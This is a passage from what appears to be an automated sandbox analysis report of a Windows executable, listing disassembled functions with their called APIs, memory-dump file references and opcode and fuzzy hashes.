    • Opcode Fuzzy Hash: 274db8acdf95fc0785b7e180772750dc20824054b6e2a5836f2d72b718f2b1ff
    • Instruction Fuzzy Hash: F64177B19042145ADB24DB60C8A5AEB73B9AF10340F4405FAF54A67093DBB55F89CF15
    Function 000413FD Relevance: 1.6, APIs: 1, Instructions: 107COMMON
    Download Yara Rule
    APIs
    • __EH_prolog.LIBCMT ref: 000413FD
      • Part of subcall function 00046891: __EH_prolog.LIBCMT ref: 00046896
      • Part of subcall function 0004E298: __EH_prolog.LIBCMT ref: 0004E29D
      • Part of subcall function 0004644D: __EH_prolog.LIBCMT ref: 00046452
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: H_prolog
    • String ID:
    • API String ID: 3519838083-0
    • Opcode ID: fa1004f6e4a7843d2aabe97e875e8d02c5f02f95494aaa82e081c6d886f589d4
    • Instruction ID: 03344e43dfdd4b42205e36ebf69225e189609638f820097f98e932cb7336e335
    • Opcode Fuzzy Hash: fa1004f6e4a7843d2aabe97e875e8d02c5f02f95494aaa82e081c6d886f589d4
    • Instruction Fuzzy Hash: E15138B1A0A3808ECB14DF2994802D9BBE5AF59300F0802BEEC5DCF69BD7755254CB66
    Function 000413F8 Relevance: 1.6, APIs: 1, Instructions: 106COMMON
    Download Yara Rule
    APIs
    • __EH_prolog.LIBCMT ref: 000413FD
      • Part of subcall function 00046891: __EH_prolog.LIBCMT ref: 00046896
      • Part of subcall function 0004E298: __EH_prolog.LIBCMT ref: 0004E29D
      • Part of subcall function 0004644D: __EH_prolog.LIBCMT ref: 00046452
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: H_prolog
    • String ID:
    • API String ID: 3519838083-0
    • Opcode ID: 6896a5617c0c4a412cc3566229fb5b5f1f7a7586b723259a2b8dd4aa4d00a20d
    • Instruction ID: 04f9bda19b260bb24929bc6ca1b2550cf096d47e49fdf34875f379f7a97b379e
    • Opcode Fuzzy Hash: 6896a5617c0c4a412cc3566229fb5b5f1f7a7586b723259a2b8dd4aa4d00a20d
    • Instruction Fuzzy Hash: B85167B190A3808EDB14DF2994802D9BBE5BF5A300F0802BEEC4DCF28BD7755254CB66
    Function 0005479D Relevance: 1.6, APIs: 1, Instructions: 89COMMON
    Download Yara Rule
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: H_prolog
    • String ID:
    • API String ID: 3519838083-0
    • Opcode ID: f03473d508b5ef77cd9c4c248dff96cfdac917eb4a29287ed7e13f9361b013ed
    • Instruction ID: b695877e32c6937059677127ea81f93d24acab650971f66f6df564b079ffbd23
    • Opcode Fuzzy Hash: f03473d508b5ef77cd9c4c248dff96cfdac917eb4a29287ed7e13f9361b013ed
    • Instruction Fuzzy Hash: 2121F8B1E40215AFDB14DF74CC426EB7AACFF05318F04453AEA05EB682E7749944C7A8
    Function 0005C207 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
    Download Yara Rule
    APIs
    • __EH_prolog.LIBCMT ref: 0005C20C
      • Part of subcall function 000413F8: __EH_prolog.LIBCMT ref: 000413FD
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: H_prolog
    • String ID:
    • API String ID: 3519838083-0
    • Opcode ID: dc5f619aaec77dcf99b8749b58c6fa96149245db5473f2f4f04f35fe00085000
    • Instruction ID: bc0c5f025b5ab8a13320cafce368fd755959ab1c4ae7637c9d93a3e06f6c06fb
    • Opcode Fuzzy Hash: dc5f619aaec77dcf99b8749b58c6fa96149245db5473f2f4f04f35fe00085000
    • Instruction Fuzzy Hash: AD214C71D04319AFDF15DF98C8419EEB7B4AF05305F0004AAE809B7242E779AE49EB65
    Function 0006BE48 Relevance: 1.6, APIs: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE
    Download Yara Rule
    APIs
    • GetProcAddress.KERNEL32(00000000,00074ADC), ref: 0006BEA8
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: AddressProc
    • String ID:
    • API String ID: 190572456-0
    • Opcode ID: a5ffe1e709a8f7286b996e35a5a25b40f75a4ae8f3932e7098c08af4ab98bc9c
    • Instruction ID: 6b98847cbba2d6049bec773d7d9641524bab32c75755ed55c848ca2f9e23c50b
    • Opcode Fuzzy Hash: a5ffe1e709a8f7286b996e35a5a25b40f75a4ae8f3932e7098c08af4ab98bc9c
    • Instruction Fuzzy Hash: AD11A377A005259FEBA19E28EC408DE73E7AF843607164220EE55EB254DB36EC818BD0
    Function 00048823 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
    Download Yara Rule
    APIs
    • __EH_prolog.LIBCMT ref: 00048828
      • Part of subcall function 0004E298: __EH_prolog.LIBCMT ref: 0004E29D
      • Part of subcall function 000533D4: __EH_prolog.LIBCMT ref: 000533D9
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: H_prolog
    • String ID:
    • API String ID: 3519838083-0
    • Opcode ID: 009acd039cf785af1fb85c296494bbfce64f3d587920696c09d725d4f4edc51b
    • Instruction ID: 9774e9582574a3c4c8accc8fa14a634f063c3919b711be6714785293164ad93a
    • Opcode Fuzzy Hash: 009acd039cf785af1fb85c296494bbfce64f3d587920696c09d725d4f4edc51b
    • Instruction Fuzzy Hash: 7A212CB0A007409ED724DF6AC4856DBFBE4BF18300F40492ED5DE97652D774A608CB91
    Function 0004E298 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
    Download Yara Rule
    APIs
    • __EH_prolog.LIBCMT ref: 0004E29D
      • Part of subcall function 00046891: __EH_prolog.LIBCMT ref: 00046896
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: H_prolog
    • String ID:
    • API String ID: 3519838083-0
    • Opcode ID: 504589ce3d514fc94f8f3bfcf7c20c479c5f0709015bbaa1dfcd6969943f0c94
    • Instruction ID: c6fdfe2e37ed96d062859c31ef3e666e00988291ac37f5438744fad90052f786
    • Opcode Fuzzy Hash: 504589ce3d514fc94f8f3bfcf7c20c479c5f0709015bbaa1dfcd6969943f0c94
    • Instruction Fuzzy Hash: E711A3B0A042809ADB14EBB9D5467EEBBE8AF84300F10407DA586D3343DF789A04C725
    Function 0005EB92 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
    Download Yara Rule
    APIs
    • __EH_prolog.LIBCMT ref: 0005EB97
      • Part of subcall function 0005197C: _wcslen.LIBCMT ref: 00051992
      • Part of subcall function 00048823: __EH_prolog.LIBCMT ref: 00048828
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: H_prolog$_wcslen
    • String ID:
    • API String ID: 2838827086-0
    • Opcode ID: aef6f116729019503489b6e694e6af9c31aadadeba5d14302bb14e616f7093c7
    • Instruction ID: ad8316ee187bd0f6983e47a9731e8e84a07fc747d6492095a805faa9b5205ad9
    • Opcode Fuzzy Hash: aef6f116729019503489b6e694e6af9c31aadadeba5d14302bb14e616f7093c7
    • Instruction Fuzzy Hash: 1B11A7719082849EF715EB68EC06BDD7FA4FB15310F00806BE54896293DFBD1A44CB67
    Function 00046891 Relevance: 1.5, APIs: 1, Instructions: 41COMMON
    Download Yara Rule
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: H_prolog
    • String ID:
    • API String ID: 3519838083-0
    • Opcode ID: 57de7846b865ddff4285e2c396011bc60f53d013c8785a3087d0cf0926529acf
    • Instruction ID: 4c6ec37fd99a03e40d15ce6d8236c1746a855d22e2fca8457b6abb92d649ef9f
    • Opcode Fuzzy Hash: 57de7846b865ddff4285e2c396011bc60f53d013c8785a3087d0cf0926529acf
    • Instruction Fuzzy Hash: 6B01A2F0A40300BBE221EB248C02FDB7BECEB84B00F00402EB715A6183D7F42600C659
    Function 0006A7EE Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
    Download Yara Rule
    APIs
    • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0006DBDC,00000000,?,000680A1,?,00000008,?,0006A861,?,?,?), ref: 0006A820
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: AllocateHeap
    • String ID:
    • API String ID: 1279760036-0
    • Opcode ID: 02ecf658fd9188f5ee3ff41f23b4b7b07bba872814c5fcd3eae232505c268102
    • Instruction ID: 77e5a953259191e5885ccd3e7572562bc32bc9645572121be67e9d71f2ba9fca
    • Opcode Fuzzy Hash: 02ecf658fd9188f5ee3ff41f23b4b7b07bba872814c5fcd3eae232505c268102
    • Instruction Fuzzy Hash: 22E030353045225AEA6136659C05BAB7ACBDF477A0B154121A805B7093DF64DC0389E3
    Function 0004B966 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 0004BA94: FindFirstFileW.KERNEL32(?,?,?,?,?,?,0004B98B,000000FF,?,?), ref: 0004BABD
      • Part of subcall function 0004BA94: FindFirstFileW.KERNEL32(?,?,?,?,00000800,?,?,?,?,0004B98B,000000FF,?,?), ref: 0004BAEB
      • Part of subcall function 0004BA94: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0004B98B,000000FF,?,?), ref: 0004BAF7
    • FindClose.KERNEL32(00000000,000000FF,?,?), ref: 0004B991
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: Find$FileFirst$CloseErrorLast
    • String ID:
    • API String ID: 1464966427-0
    • Opcode ID: 482db70c6ab80a52583f809b2def75759157f394b1c8a1f8010fdfc4c3eb3298
    • Instruction ID: d5f56f6853f39d1489cb093781ceb06358dfaac02828cd399c857ebf30b2507e
    • Opcode Fuzzy Hash: 482db70c6ab80a52583f809b2def75759157f394b1c8a1f8010fdfc4c3eb3298
    • Instruction Fuzzy Hash: 47F082B2408790AACA621BB848047CBBFE05F16335F008A59F6FD122D7C37494959726
    Function 00052121 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON
    Download Yara Rule
    APIs
    • SetThreadExecutionState.KERNEL32(00000001), ref: 00052156
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: ExecutionStateThread
    • String ID:
    • API String ID: 2211380416-0
    • Opcode ID: d344459dd56d1e8d274daf8b8ad55ec8eb7409bdd6a7007961d64ae58e756432
    • Instruction ID: e30245d44cf6ffb697a553c79dc16e1097954b400debf13f662a0b5c4989a48e
    • Opcode Fuzzy Hash: d344459dd56d1e8d274daf8b8ad55ec8eb7409bdd6a7007961d64ae58e756432
    • Instruction Fuzzy Hash: 35D0C21070441012EA25373868067FF0A461FC3315F0900A7BA0C161838B68088B86F5
    Function 0005B626 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON
    Download Yara Rule
    APIs
    • GdipAlloc.GDIPLUS(00000010), ref: 0005B62C
      • Part of subcall function 0005B3B8: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0005B3D9
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: Gdip$AllocBitmapCreateFromStream
    • String ID:
    • API String ID: 1915507550-0
    • Opcode ID: 67c6c0b1a9f8045d953eebf11179e7c179da5fb7bf356439fdf6af47a3be8cb5
    • Instruction ID: b84151987878bc2d41f63a8ef1f57c81c53483c148cb43e602c8dfe4e4696b84
    • Opcode Fuzzy Hash: 67c6c0b1a9f8045d953eebf11179e7c179da5fb7bf356439fdf6af47a3be8cb5
    • Instruction Fuzzy Hash: A6D023302003097ADF412B31CC029BF75D5EB00341F0080317C01D5181EFF5ED145261
    Function 00046920 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
    Download Yara Rule
    APIs
    • __EH_prolog.LIBCMT ref: 00046925
      • Part of subcall function 000504E5: __EH_prolog.LIBCMT ref: 000504EA
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: H_prolog
    • String ID:
    • API String ID: 3519838083-0
    • Opcode ID: de1b7db121c407e33fabeb1e724126d6025d48e9a3e56e4d5600015fefcf599f
    • Instruction ID: 0b54e8487d35d3a843dd990fa69e836fb93903ac50a79d439636ea46885093c3
    • Opcode Fuzzy Hash: de1b7db121c407e33fabeb1e724126d6025d48e9a3e56e4d5600015fefcf599f
    • Instruction Fuzzy Hash: 8DD05EB2E104759BD705BB48D4123FEB268EB04701F00416AF511B3342CBB84E048785
    Function 0005F737 Relevance: 1.5, APIs: 1, Instructions: 13COMMONLIBRARYCODE
    Download Yara Rule
    APIs
    • DloadProtectSection.DELAYIMP ref: 0005F75F
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: DloadProtectSection
    • String ID:
    • API String ID: 2203082970-0
    • Opcode ID: 8d95f69f2fece956cc832165f32a16eeb18d3cfd581f8440817dd81407880d5d
    • Instruction ID: b65775ce93f4ee7c17448a6440eaeea724e12cec53ebbb31560b61d146ce8d9c
    • Opcode Fuzzy Hash: 8d95f69f2fece956cc832165f32a16eeb18d3cfd581f8440817dd81407880d5d
    • Instruction Fuzzy Hash: DCD0123090CE0FDAE255ABB4AD467F766E5F30D34BF400521FE46D6195D76C4548C611
    Function 0005EEAD Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON
    Download Yara Rule
    APIs
    • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00052E78), ref: 0005EED2
      • Part of subcall function 0005C748: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0005C759
      • Part of subcall function 0005C748: KiUserCallbackDispatcher.NTDLL(?,00000000,00000000,00000000), ref: 0005C76A
      • Part of subcall function 0005C748: IsDialogMessageW.USER32(00010468,?), ref: 0005C77E
      • Part of subcall function 0005C748: TranslateMessage.USER32(?), ref: 0005C78C
      • Part of subcall function 0005C748: DispatchMessageW.USER32(?), ref: 0005C796
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: Message$CallbackDialogDispatchDispatcherItemPeekSendTranslateUser
    • String ID:
    • API String ID: 3453300979-0
    • Opcode ID: fe860466edc9207ae54fdeb0d081a5794a11680a16c8a0ce005251252c0d9734
    • Instruction ID: 798a50318514be4927a990ec1bfa1d995b9525294be1937d9daca11e170b3acb
    • Opcode Fuzzy Hash: fe860466edc9207ae54fdeb0d081a5794a11680a16c8a0ce005251252c0d9734
    • Instruction Fuzzy Hash: 3AD09E31145704BEEA012B51DD06F4B7AE2BFC9B0AF005555B785744B286669E259B02
    Function 0004AB1C Relevance: 1.5, APIs: 1, Instructions: 12COMMON
    Download Yara Rule
    APIs
    • GetFileType.KERNEL32(000000FF,0004AA1E), ref: 0004AB28
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
